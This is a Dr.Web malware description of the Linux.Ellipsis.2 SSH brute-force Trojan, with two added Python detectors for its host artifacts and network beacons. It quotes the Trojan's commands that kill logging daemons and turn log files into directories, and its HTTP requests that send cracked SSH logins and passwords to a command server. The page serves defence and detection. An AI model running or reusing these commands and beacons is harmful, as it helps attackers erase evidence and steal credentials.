Linux.Ellipsis.2

Added to the Dr.Web virus database: 2015-09-10

Virus description added:

SHA1:

  • c93957405ed43d8cca936dcf9a894a82fa10a518 (unpacked)
  • 8b34e16d1542766d7c09472dfa23a69a0e1c13ce (UPX)

A Trojan for Linux designed to brute-force accounts in order to gain access to attacked systems over the SSH protocol. Once launched, it takes a single command-line argument:

auto:zzz.ccc.vvv.bbb

where zzz.ccc.vvv.bbb is the IP address of the command and control server.

Once launched, the Trojan removes its own working directory ("/tmp/.../") and flushes the list of iptables rules. Then it kills the processes of a number of running applications, for example programs used to log events and analyze traffic:

killall syslogd rsyslogd syslog syslog-ng named dnscache dnsmasq tcpdump
killall -9 syslogd rsyslogd syslog syslog-ng named dnscache dnsmasq tcpdump
kill -9 `pidof syslogd rsyslogd syslog syslog-ng named dnscache dnsmasq tcpdump`

Using the "/var/log/*" and "/disk/*log*" masks, the Trojan replaces the existing system log files and directories with directories of the same names; because a directory now occupies each path, log files with those names can no longer be created:

mkdir /var/log/all.log /var/log/auth.log /var/log/messages /var/log/secure /var/log/everything.log /var/log/messages.log /disk/all.log /disk/auth.log /disk/messages /disk/secure /disk/everything.log /disk/messages.log
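The two host-side artifacts described above (logging and traffic-analysis daemons killed, and log file paths replaced by same-named directories) can be checked for directly. The following is an added example, not code from Dr.Web or from the page; it reads the paths and daemon names from the commands quoted above and treats the set of daemons that should normally be running on a given host as an assumption the operator supplies.

```python
import os

# Log paths from the mkdir command quoted above, which the Trojan turns
# into directories (both the /var/log and /disk trees).
LOG_PATHS = [
    "/var/log/all.log", "/var/log/auth.log", "/var/log/messages",
    "/var/log/secure", "/var/log/everything.log", "/var/log/messages.log",
    "/disk/all.log", "/disk/auth.log", "/disk/messages", "/disk/secure",
    "/disk/everything.log", "/disk/messages.log",
]

# Logging and traffic-analysis daemons from the killall commands quoted above.
KILLED_DAEMONS = ["syslogd", "rsyslogd", "syslog", "syslog-ng", "named",
                  "dnscache", "dnsmasq", "tcpdump"]


def log_paths_replaced_by_dirs(paths=LOG_PATHS, isdir=os.path.isdir):
    """Return the log paths that now exist as directories instead of files.

    A regular log path that has become a directory is the artifact the Trojan
    leaves behind; `isdir` is injectable so the check can run against a fake
    filesystem in a test.
    """
    return [p for p in paths if isdir(p)]


def running_process_names(proc_root="/proc"):
    """Collect process names from /proc/<pid>/comm (Linux only)."""
    names = set()
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue
        try:
            with open(os.path.join(proc_root, entry, "comm")) as fh:
                names.add(fh.read().strip())
        except OSError:
            continue  # process exited or is not readable
    return names


def missing_daemons(running, expected):
    """Return the names in `expected` that are not among the running processes."""
    return [name for name in expected if name not in running]


def assess(dir_hits, missing, expected_running):
    """Combine both artifacts into a verdict string.

    `expected_running` is the subset of KILLED_DAEMONS the operator knows
    should be up on this host (for example only rsyslogd), so that a tool that
    is normally absent, such as tcpdump, does not raise an alert on its own.
    """
    findings = []
    if dir_hits:
        findings.append("log paths replaced by directories: " + ", ".join(dir_hits))
    lost = [d for d in missing if d in expected_running]
    if lost:
        findings.append("expected logging daemons not running: " + ", ".join(lost))
    if len(findings) == 2:
        return "HIGH: " + "; ".join(findings)
    if findings:
        return "MEDIUM: " + findings[0]
    return "CLEAN"


if __name__ == "__main__":
    hits = log_paths_replaced_by_dirs()
    gone = missing_daemons(running_process_names(), KILLED_DAEMONS)
    # Assumption: this host normally runs rsyslogd; adjust to the local baseline.
    print(assess(hits, gone, expected_running={"rsyslogd"}))
```

Run it as root on the suspect host so every /proc entry is readable; a single replaced log path is already a strong indicator because no legitimate package turns /var/log/messages into a directory.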

Then the Trojan reads from /proc/cpuinfo the processor frequency value given in the "bogomips" field. From this value it calculates the total number of scanning threads and SSH connections it will use.

After that, the Trojan requests tasks from the server whose address it received as the startup argument. A task obtained from the server contains the address of a subnet, which the malicious program scans for devices with SSH open on port 22. For every device found, the Trojan tries to connect using each login:password pair from a special list in turn. If an attempt succeeds, the Trojan reports it to the cybercriminals' server with the following request:

GET /auto.cgi?root=yes&ip=%s&l=%s&p=%s HTTP/1.0\nUser-Agent: Mozilla\nAccept-Language: en\nHost: auto\nCopyright: 2005 by RS from Romania Hello World Microsoft Sucks Bill Gates Must die\n\n

where ip is the IP address of the node to which the connection was established, l is the login, and p is the password.

Using a separate thread, the malware sends the following request to the command and control server with a one-minute interval:

GET /auto.cgi?report=yes&finish=%d&net=%s&seconds=%d&open=%d&rootcount=%d&sshspeed=%d&totalssh=%d&ssherrors=%d&totalscan=%d&scanmax=%d&sshmax=%d HTTP/1.0\nUser-Agent: Mozilla\nAccept-Language: en\nHost: auto\nCopyright: 2005 by RS from Romania Hello World Microsoft Sucks Bill Gates Must die\n\n

In these requests the "finish" value is zero. Once scanning is over, the Trojan sends 10 similar requests with a "finish" value of 1, at a 1-second interval.

The net parameter contains the IP address of the subnet currently scanned by the Trojan.
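Both request formats above, with their fixed Host and Copyright headers, are easy to pick out of a web proxy or IDS capture. The following is an added example, not code from Dr.Web or from the page: it parses raw HTTP requests, recognises the two beacon shapes by their query parameters, and returns a structured alert. The sample requests are constructed, with the %s/%d placeholders filled with made-up values, and the password field of a credential hit is deliberately left out of the alert.

```python
from urllib.parse import urlsplit, parse_qs

# Fixed header block shared by both request shapes quoted on the page.
C2_HEADER_TAIL = ("User-Agent: Mozilla\nAccept-Language: en\nHost: auto\n"
                  "Copyright: 2005 by RS from Romania Hello World Microsoft Sucks "
                  "Bill Gates Must die\n\n")

# Constructed samples (not captured traffic): one credential hit, one scan
# report, and one ordinary request that must not match.
SAMPLE_REQUESTS = [
    "GET /auto.cgi?root=yes&ip=203.0.113.7&l=root&p=samplepw HTTP/1.0\n" + C2_HEADER_TAIL,
    "GET /auto.cgi?report=yes&finish=0&net=203.0.113.0&seconds=60&open=3&rootcount=1"
    "&sshspeed=12&totalssh=40&ssherrors=5&totalscan=254&scanmax=8&sshmax=4 HTTP/1.0\n"
    + C2_HEADER_TAIL,
    "GET /index.html HTTP/1.1\nUser-Agent: Mozilla\nHost: example.org\n\n",
]

# Numeric counters carried by the report beacon, in the order the page lists them.
REPORT_COUNTERS = ["seconds", "open", "rootcount", "sshspeed", "totalssh",
                   "ssherrors", "totalscan", "scanmax", "sshmax"]


def parse_request(raw):
    """Split a raw HTTP request into (method, target, headers)."""
    lines = raw.split("\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if not line:
            break  # blank line ends the header block
        name, _, value = line.partition(":")
        headers[name.strip()] = value.strip()
    return method, target, headers


def classify(raw):
    """Return a structured alert for an Ellipsis.2 beacon, or None for other traffic."""
    method, target, headers = parse_request(raw)
    parts = urlsplit(target)
    if method != "GET" or parts.path != "/auto.cgi":
        return None
    q = {k: v[0] for k, v in parse_qs(parts.query).items()}
    # The constant Host and Copyright headers are a strong secondary signature.
    strong = headers.get("Host") == "auto" and "Copyright" in headers
    if q.get("root") == "yes":
        # Credential hit: responders need the victim address and login; the
        # password value is intentionally not copied into the alert.
        return {"kind": "credential_hit", "target": q.get("ip"),
                "login": q.get("l"), "strong_signature": strong}
    if q.get("report") == "yes":
        return {"kind": "scan_report", "net": q.get("net"),
                "finish": int(q.get("finish", "0")),
                "counters": {k: int(q[k]) for k in REPORT_COUNTERS if k in q},
                "strong_signature": strong}
    return None


def scan(requests):
    """Classify a list of raw requests and keep only the beacons."""
    return [alert for alert in map(classify, requests) if alert is not None]


if __name__ == "__main__":
    for alert in scan(SAMPLE_REQUESTS):
        print(alert)
```

A credential_hit alert names a host whose SSH password has just been guessed and should be treated as a separate incident; a scan_report with finish=1 marks the end of a sweep of the subnet given in net.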

Curing recommendations

Linux

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

© Doctor Web
2003 — 2022
